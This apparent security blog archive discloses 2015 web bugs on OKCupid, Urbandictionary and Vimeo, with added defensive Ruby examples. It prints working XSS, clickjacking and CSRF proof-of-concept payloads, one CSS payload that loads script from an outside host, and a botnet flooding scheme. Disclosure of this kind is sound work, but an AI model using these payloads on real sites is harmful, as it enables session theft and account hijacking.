Sunday, 29 November 2015

Encrypt files with Ruby and OpenSSL

I created this script to make my life easier when encrypting files. Google Drive, Dropbox and the other cloud platforms don't have an option to password-protect or encrypt your files. With this Ruby script you will be able to encrypt individual files with a password. It encrypts one file at a time, but if you want a bunch of them you can zip them and encrypt the zip file.
Note: it doesn't use the OpenSSL Ruby library; it requires OpenSSL to be installed on your system. It comes by default on Linux and hasn't been tested on Windows.

Here's how it works:

Let's say we have the text file below that we want to encrypt.

To Encrypt:
  1. Simply run the Ruby script first
  2. Type 1 to encrypt
  3. Type the file name; if the file is under a different folder you can type the full path, e.g. /opt/testing/test.txt
  4. Enter a password (it won't be visible as you type it), and then re-enter it.
  5. That's it: it will create a file under the same path with the extension .des3


To Decrypt:

It's the same process as for encryption: select option 2, and the file name has to include the .des3 extension. The output name will be the same without .des3, so make sure a file with that name doesn't exist in that path.


The script:
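The post's own script is not reproduced on this page. As an added example (my code, not the author's script), here is the same password-based file encryption done with Ruby's openssl library instead of shelling out to the openssl binary; it uses AES-256-GCM with a PBKDF2-derived key rather than des3, the file layout (MAGIC, salt, IV, ciphertext, tag) is my own construction, and the .enc suffix is assumed.

```ruby
require "openssl"
require "securerandom"
# Constructed file layout: MAGIC | 16-byte salt | 12-byte IV | ciphertext | 16-byte GCM tag
MAGIC = "RBENC1".b.freeze
SALT_LEN, IV_LEN, TAG_LEN, ITERS = 16, 12, 16, 200_000

# PBKDF2-HMAC-SHA256 stretches the typed password into a 256-bit AES key.
def derive_key(password, salt)
  OpenSSL::PKCS5.pbkdf2_hmac(password, salt, ITERS, 32, OpenSSL::Digest.new("sha256"))
end

# AES-256-GCM both encrypts and authenticates, so a modified file or a wrong
# password is detected on decryption instead of silently producing garbage.
def encrypt_bytes(plaintext, password)
  salt, iv = SecureRandom.random_bytes(SALT_LEN), SecureRandom.random_bytes(IV_LEN)
  c = OpenSSL::Cipher.new("aes-256-gcm").encrypt
  c.key, c.iv = derive_key(password, salt), iv
  c.auth_data = MAGIC
  ct = (plaintext.empty? ? "".b : c.update(plaintext)) + c.final
  MAGIC + salt + iv + ct + c.auth_tag
end

# Returns the plaintext, or nil when the password is wrong or the blob was altered.
def decrypt_bytes(blob, password)
  hdr = MAGIC.bytesize + SALT_LEN + IV_LEN
  return nil unless blob.start_with?(MAGIC) && blob.bytesize >= hdr + TAG_LEN
  salt = blob.byteslice(MAGIC.bytesize, SALT_LEN)
  iv   = blob.byteslice(MAGIC.bytesize + SALT_LEN, IV_LEN)
  ct   = blob.byteslice(hdr, blob.bytesize - hdr - TAG_LEN)
  c = OpenSSL::Cipher.new("aes-256-gcm").decrypt
  c.key, c.iv = derive_key(password, salt), iv
  c.auth_tag  = blob.byteslice(-TAG_LEN, TAG_LEN)
  c.auth_data = MAGIC
  (ct.empty? ? "".b : c.update(ct)) + c.final
rescue OpenSSL::Cipher::CipherError
  nil
end

# File wrappers mirroring the post's flow (<name> -> <name>.enc and back);
# decryption refuses to overwrite an existing output, as the post advises.
def encrypt_file(path, password)
  File.binwrite("#{path}.enc", encrypt_bytes(File.binread(path), password))
end

def decrypt_file(path, password)
  out = path.delete_suffix(".enc")
  raise ArgumentError, "#{out} already exists" if File.exist?(out)
  pt = decrypt_bytes(File.binread(path), password) or raise ArgumentError, "wrong password or damaged file"
  File.binwrite(out, pt)
end
```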

Wednesday, 16 September 2015

OKCupid.com Security holes

1) Stored XSS

In the comment section of their blog you could store XSS, and any user or admin who visited that blog post would get XSSed.
The PoC: break out of the input, insert a non-existent image, and on error it pops up our script to steal session cookies etc...
"><img src=x onerror=prompt(1);>

2) Clickjacking

POC:
<html>
  <head>
    <title>Clickjack test page</title>
  </head>
  <body>
  <style>
   iframe { 
     top:0; left:0;
     filter:alpha(opacity=50); /* in real life opacity=0 */
     opacity:1;
    }
  </style>
  <p>You've been clickjacked!</p>
    <iframe sandbox="allow-scripts allow-forms" src="http://okcupid.com"
       style="width:100%;height:90%">
    </iframe>
  </body>
</html>

What is clickjacking: www.owasp.org/index.php/Clickjacking
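The check a defender would run for the clickjacking item, as an added example that is not from the post: given a page's response headers, decide whether a browser would let another origin put it in an iframe. The functions are hypothetical; origins are passed as lowercase scheme://host strings, and frame-ancestors, when present, is given precedence over X-Frame-Options, as browsers do.

```ruby
# Pull the source list of a frame-ancestors directive out of a CSP header,
# or nil when the header carries no such directive.
def frame_ancestor_sources(csp)
  return nil if csp.nil?
  d = csp.split(";").map(&:strip).find { |x| x.downcase.start_with?("frame-ancestors") }
  d && d.split(/\s+/).drop(1).map(&:downcase)
end

# Does one CSP source expression permit `framer` to embed `page`?
def source_allows?(src, page, framer)
  return false if src == "'none'"
  return framer == page if src == "'self'"
  return true if src == "*"
  return framer.start_with?(src) if src.match?(/\A[a-z][a-z0-9+.\-]*:\z/) # scheme-only source
  scheme, host = src.include?("://") ? src.split("://", 2) : [nil, src]
  fscheme, fhost = framer.split("://", 2)
  return false if fhost.nil? || (scheme && scheme != fscheme)
  host.start_with?("*.") ? fhost.end_with?(host[1..]) : fhost == host
end

# True when a browser would let `framer` frame `page`, judged from the
# response headers alone (header names are matched case-insensitively).
def frameable?(headers, page:, framer:)
  h = headers.transform_keys { |k| k.to_s.downcase }
  page, framer = page.downcase, framer.downcase
  srcs = frame_ancestor_sources(h["content-security-policy"])
  return srcs.any? { |s| source_allows?(s, page, framer) } unless srcs.nil?
  case h["x-frame-options"].to_s.strip.downcase
  when "deny"       then false
  when "sameorigin" then framer == page
  when /\Aallow-from\s+(\S+)/ then framer == $1.chomp("/")
  else true  # no framing protection at all: any site can embed the page
  end
end
```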

Friday, 20 March 2015

CSRF on Urbandictionary.com, Persistent Token


Urbandictionary is vulnerable to CSRF attacks on every POST request throughout the website.
An attacker can change a user's personal details, vote on their behalf, log them out and so on...
For most of the POST requests an authenticity token is required before they are processed. That's a good defense mechanism, unless you can reuse the same token even after logging out and in again...

authenticity_token

On Urbandictionary you can use the same token as many times as you want, so all we need to do is include it in our CSRF attack (it can be done with both POST and GET requests):
<body onload=document.getElementById('csrf').submit()>
<form id="csrf" action="http://www.urbandictionary.com/game.save.php">
<input type="hidden" name="id" value="1204725">
<input type="hidden" name="response" value="1">
<input type="hidden" name="authenticity_token" value="Pubso039ovSL7lFWltxMKJjWbIVF8%2FylhzQKsHbWezM%3D">
</form>
The whole website was vulnerable to this attack, and on some forms the authenticity token was not included at all.
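What the defence looks like when the token is actually bound to the session, as an added example and not Urbandictionary's code: a hypothetical in-memory session store that mints a fresh authenticity token on every login, drops it on logout, refuses tokens over GET, and compares in constant time. Class and method names are my own.

```ruby
require "securerandom"

# Constant-time equality so a token can't be recovered byte by byte from timing.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

class SessionStore
  def initialize
    @sessions = {}   # session id => { user:, token: }
  end

  # Every login mints a fresh session AND a fresh authenticity token, so a
  # token captured from an earlier session never validates in a later one.
  def login(user)
    sid = SecureRandom.hex(16)
    @sessions[sid] = { user: user, token: SecureRandom.urlsafe_base64(32) }
    sid
  end

  # Logout destroys the session; the token dies with it.
  def logout(sid)
    @sessions.delete(sid)
    nil
  end

  def token_for(sid)
    @sessions.fetch(sid)[:token]
  end

  # Decide whether a state-changing request may proceed. GET never qualifies
  # (the post notes the attack also worked over GET), and the submitted token
  # must match the one bound to THIS session.
  def accept?(method, sid, submitted_token)
    return false unless method == "POST"
    session = @sessions[sid]
    return false if session.nil? || submitted_token.nil?
    secure_equal?(session[:token], submitted_token.to_s)
  end
end
```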

Tuesday, 27 January 2015

GET request Flooding, Websites as a proxy

This is a controversial vulnerability: some websites consider it a valid one, and others don't bother much about it.

Many websites have an option to fetch an image from an external URL, or to post a comment containing a link that loads the title and description in real time; these are the most common examples. In both cases a GET request is made to the third-party website, not from your PC but from the originating website.

What if we customize the GET request and repeat it a couple of hundred times?
Let's take the example below to demonstrate this scenario:

We first find an input that requests a URL from a third-party website, and we modify the input to any GET request we like.


When you press the import button the GET request is sent. We can then capture the data being transmitted in order to repeat the process.


Most websites don't allow the same request to be sent more than once, which is why we have to change a value on every request. That can be achieved in many different ways; in my case I created a small PHP cURL script that does it for you.
We copy all the previously captured data and paste it into the script for the flooding process.

If the attacker has a botnet, they can generate this request many times from different locations targeting a single website, and the victim's website will log the IP addresses of the originating website, allowing the attacker to obfuscate the attack a step further by using a website as a proxy.
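A guard the originating website could put in front of its "fetch this URL" feature, as an added example that is not from the post: it rejects non-HTTP targets, refuses a repeat of the same URL inside a window, and caps how many server-side fetches one user may trigger per window, which is what still bites when the value is changed on every request. The class is hypothetical and the clock is injected so the window can be exercised without sleeping.

```ruby
require "uri"

class OutboundFetchGuard
  # limit: fetches one user may trigger per window (seconds).
  def initialize(limit:, window:, clock: -> { Time.now.to_f })
    @limit, @window, @clock = limit, window, clock
    @recent = Hash.new { |h, k| h[k] = [] }   # user => [[time, url], ...]
  end

  # Returns :ok when the server may perform the fetch, otherwise a reason:
  # :bad_url (not http/https), :duplicate (same URL inside the window) or
  # :rate_limited. Varying a query value to beat the duplicate check, as the
  # post describes, still counts against the per-user limit.
  def check(user, raw_url)
    url = (URI.parse(raw_url) rescue nil)
    return :bad_url unless url.is_a?(URI::HTTP) && url.host
    now = @clock.call
    history = @recent[user] = @recent[user].select { |t, _| now - t < @window }
    return :duplicate if history.any? { |_, u| u == url.to_s }
    return :rate_limited if history.size >= @limit
    history << [now, url.to_s]
    :ok
  end
end
```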


Tuesday, 13 January 2015

XSS on Vimeo

http://developer.vimeo.com had a flaw in one of its inputs.

Here is how it works:

They have an input where you can add a URL and it will fetch an image from anywhere and display it as the logo for your app:


Apart from the XSS, they weren't filtering the input to accept only image links.

The PoC XSS:

http://alex.avlonitis.me/images/face.png' onmouseover="onmouseover="alert(document.domain)"

The input break:



Saturday, 10 January 2015

Xss in hidden input. Possible?

While I was trying to find a way to exploit a vulnerable HTML hidden input on a famous website (the < > were sanitised), I gathered some information from trying many different techniques, which might help on a different website.
The vulnerable input looks something like this:

<input id='myInput' type='hidden' value='dynamic'/> 

It could be broken with a single quote: ' onmouseover="alert(1)" . And that would become:

<input id='myInput' type='hidden' value='dynamic' onmouseover="alert(1)" />

Unfortunately, even if we break the input with onmouseover nothing happens, because there is nothing visible on the page to hover over. None of the other attributes worked either, including onchange.

Can we overwrite the type field by adding type="text"?
No, that's not possible any more.

What if we style it inline with CSS and make it visible, with the examples below:
style="display: block;width: 999px;height: 999px;"
style="display: inline;width: 999px;height: 999px;"
style="visibility: visible;"
None of that worked in this case, as the CSS couldn't override the HTML attribute.

Maybe try to fire up JavaScript from within CSS:
style="width: expression(alert('xss'));"
style="-moz-binding:url('http://ha.ckers/xss.js');"
No luck...

I haven't found a way to bypass this yet.

sources:
owasp.org
sla.ckers.org
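The hardened form of the templates behind this post, the Vimeo post and the OKCupid stored XSS above, as an added example that is none of those sites' code: the hidden-input tag rendered with the value interpolated raw next to the same tag rendered with attribute escaping, fed quote-breaking values of the kind the posts describe. The render functions and the sample payloads are my own constructions.

```ruby
require "cgi"

# The post's hidden input with the value interpolated raw: a value containing
# a quote closes the attribute, and whatever follows becomes markup.
def render_hidden_unsafe(value)
  "<input id='myInput' type='hidden' value='#{value}'/>"
end

# The same template with attribute escaping. CGI.escapeHTML rewrites ' as
# &#39; and " as &quot; (plus < > &), so no value can leave the attribute,
# whichever quote style the template uses.
def render_hidden_safe(value)
  "<input id='myInput' type='hidden' value='#{CGI.escapeHTML(value)}'/>"
end

# Constructed sample values: the hidden-input break from this post, and a
# logo-URL value in the style of the Vimeo post (double-quoted handler
# after a single quote).
HIDDEN_PAYLOAD = %q(dynamic' onmouseover="alert(1)")
LOGO_PAYLOAD   = %q(http://example.invalid/face.png' onmouseover="alert(document.domain)")

# Names of the attributes a browser would see on the rendered tag. The safe
# render always yields exactly id, type and value.
def attribute_names(tag)
  tag.scan(/\s([a-zA-Z-]+)=(?:'[^']*'|"[^"]*")/).flatten
end
```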



Sunday, 4 January 2015

Automated Backup of Cisco switches

I created a small script to auto-backup the Cisco switches on the network using Perl; it connects to switches configured for SSH and for Telnet.

Libraries you will need: Net::SSH2, Net::Telnet::Cisco